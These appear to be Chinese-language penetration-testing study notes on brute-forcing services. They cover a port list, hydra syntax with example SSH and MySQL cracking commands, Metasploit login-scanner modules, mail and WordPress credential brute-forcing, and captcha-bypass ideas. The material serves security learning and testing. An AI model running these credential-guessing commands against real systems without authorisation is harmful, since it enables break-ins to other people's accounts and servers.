web安全穷举
文件和目录穷举
1. PK(破壳工具)
2. 御剑
3. dirbuster
常见的端口服务
http 80
https 443
ftp 21
ssh 22
mysql 3306
mssql 1433
rsync 873
oracle 1521
mogo 28017
redis 6379
tomcat 8080
smtp 25
P0P3 110
dns 53
telnet 23
vnc 5900
Apache/Tomcat/Nginx/Axis2/resin/jboss 80|8080
WebLogic 7001
Jenkins 8080 8089
rdp 3389
elasticsearch 9200 9300
穷举爆破神器
hydra
https://www.thc.org/
https://www.thc.org/releases/hydra-8.4.tar.gz
hydra [[[-l LOGIN|-L FILE] [-p PASS|-PFILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]][-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为16。
-w TIME 设置最大超时的时间,单位秒,默认是30s。
-v / -V 显示详细过程。
service 指定服务名,支持的服务和协议:telnetftp pop3[-ntlm] imap[-ntlm] smb smbnt
http-{head|get} http-{get|post}-formhttp-proxy cisco cisco-enable vnc
ldap2 ldap3 mssql mysql oracle-listenerpostgres nntp socks5 rexec
rlogin pcnfs snmp rsh cvs svn icq sapr3 sshsmtp-auth[-ntlm] pcanywhere
teamspeak sip vmauthd firebird ncp afp等等。
hydra -L /root/user -P /root/passwd ssh://192.168.1.0 -f -o /root/crack.txt -V
hydra -L /root/user -P /root/passwd mysql://192.168.0.129 -f -o /root/crack.txt –v -s 3306
xhydra 可视化破解工具
kali里面自带的工具
kali metasploit 穷举模块的使用
auxiliary/scanner/ftp/ftp_login
auxiliary/scanner/ssh/ssh_login
auxiliary/scanner/telnet/telnet_login
auxiliary/scanner/smb/smb_login
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/oracle/oracle_login
auxiliary/scanner/postgres/postgres_login
auxiliary/scanner/vnc/vnc_login
auxiliary/scanner/pcanywhere/pcanywhere_login
auxiliary/scanner/snmp/snmp_login
打开kali系统,msfconsole 输入命令search login 用来查找模块
use auxiliary/scanner/ssh/ssh_login 进入模块
info 查看该模块信息
set RHOSTS 192.168.0.113
show options
run
邮箱爆破
首先 nmap进行扫描 nmap -sV -Pn 192.168.0.115
25/tcp smtp
110/tcp pop3 这两个是邮件的端口
利用MailCracker工具进行爆破
网站爆破
指定后台的穷举(没有验证码用burp爆破)
phpadmin后台破解 (phpMyAdmin暴力破解v1.3)
wordpress穷举 https://github.com/dionach/CMSmap
下载: git clone https://github.com/dionach/CMSmap ./cmsmap.py http://www.wordpress.com
单个线程:cmsmap.py https://example.com -u admin -p passwords.txt
多个线程: ./cmsmap.py -i /root/wp.txt -u admin -p /root/password.txt -v -o w.txt
有验证码的爆破
1. 验证码是否可以重复使用
2. 验证码cookie是否重复利用
3. 验证码是否可以识别
wfuzz工具